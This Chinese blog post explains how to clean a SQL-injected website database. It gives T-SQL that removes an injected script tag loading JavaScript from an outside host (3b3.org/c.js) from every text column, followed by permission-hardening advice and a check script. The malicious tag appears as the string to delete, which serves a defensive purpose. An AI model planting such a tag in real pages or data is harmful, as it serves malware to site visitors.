zoukankan      html  css  js  c++  java
  • 网站被注入了

    如何最快速度删除?
    " <script src=http://3b3.org/c.js> </script> "
    ---------------------------------------------------------------
    进入SQL查询分析器
    选择你的数据库
    第一步:先sql表修改所有者为dbo
    EXEC sp_MSforeachtable 'exec sp_changeobjectowner ' '? ' ', ' 'dbo ' ' '

    第二步:统一删除字段被挂的js
    declare @delStr nvarchar(500)
    set @delStr= ' <script src=http://3b3.org/c.js> </script> '

    set nocount on

    declare @tableName nvarchar(100),@columnName nvarchar(100),@tbID int,@iRow int,@iResult int
    declare @sql nvarchar(500)

    set @iResult=0
    declare cur cursor for
    select name,id from sysobjects where xtype= 'U '

    open cur
    fetch next from cur into @tableName,@tbID

    while @@fetch_status=0
    begin
    declare cur1 cursor for
    --xtype in (231,167,239,175,35) 为char,varchar,nchar,nvarchar,text类型
    select name from syscolumns where xtype in (231,167,239,175,35) and id=@tbID
    open cur1
    fetch next from cur1 into @columnName
    while @@fetch_status=0
    begin
    set @sql= 'update [ ' + @tableName + '] set [ '+ @columnName + ']= replace([ '+@columnName+ '], ' ' '+@delStr+ ' ' ', ' ' ' ') where [ '+@columnName+ '] like ' '% '+@delStr+ '% ' ' '
    exec sp_executesql @sql
    set @iRow=@@rowcount
    set @iResult=@iResult+@iRow
    if @iRow> 0
    begin
    print '表: '+@tableName+ ',列: '+@columnName+ '被更新 '+convert(varchar(10),@iRow)+ '条记录; '
    end
    fetch next from cur1 into @columnName


    end
    close cur1
    deallocate cur1

    fetch next from cur into @tableName,@tbID
    end
    print '数据库共有 '+convert(varchar(10),@iResult)+ '条记录被更新!!! '

    close cur
    deallocate cur
    set nocount off
    ---------------------------------------------------------------
    彻底杜绝SQL注入

    1.不要使用sa用户连接数据库
    2、新建一个public权限数据库用户,并用这个用户访问数据库
    3、[角色]去掉角色public对sysobjects与syscolumns对象的select访问权限
    4、[用户]用户名称-> 右键-属性-权限-在sysobjects与syscolumns上面打“×”
    5、通过以下代码检测(失败表示权限正确,如能显示出来则表明权限太高):
    DECLARE @T varchar(255),
    @C varchar(255)
    DECLARE Table_Cursor CURSOR FOR
    Select a.name,b.name from sysobjects a,syscolumns b
    where a.id=b.id and a.xtype= 'u ' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
    OPEN Table_Cursor
    FETCH NEXT FROM Table_Cursor INTO @T,@C
    WHILE(@@FETCH_STATUS=0)
    BEGIN print @c
    FETCH NEXT FROM Table_Cursor INTO @T,@C
    END
    CLOSE Table_Cursor
    DEALLOCATE Table_Cursor
  • 相关阅读:
    剑指Offer-30.连续子数组的最大和(C++/Java)
    剑指Offer-29.最小的K个数(C++/Java)
    UVA 1616 Caravan Robbers 商队抢劫者(二分)
    UVA 10570 Meeting with Aliens 外星人聚会
    UVA 11093 Just Finish it up 环形跑道 (贪心)
    UVA 12673 Erratic Expansion 奇怪的气球膨胀 (递推)
    UVA 10954 Add All 全部相加 (Huffman编码)
    UVA 714 Copying Books 抄书 (二分)
    UVALive 3523 Knights of the Round Table 圆桌骑士 (无向图点双连通分量)
    codeforecs Gym 100286B Blind Walk
  • 原文地址:https://www.cnblogs.com/dfsxh/p/1449916.html
Copyright © 2011-2022 走看看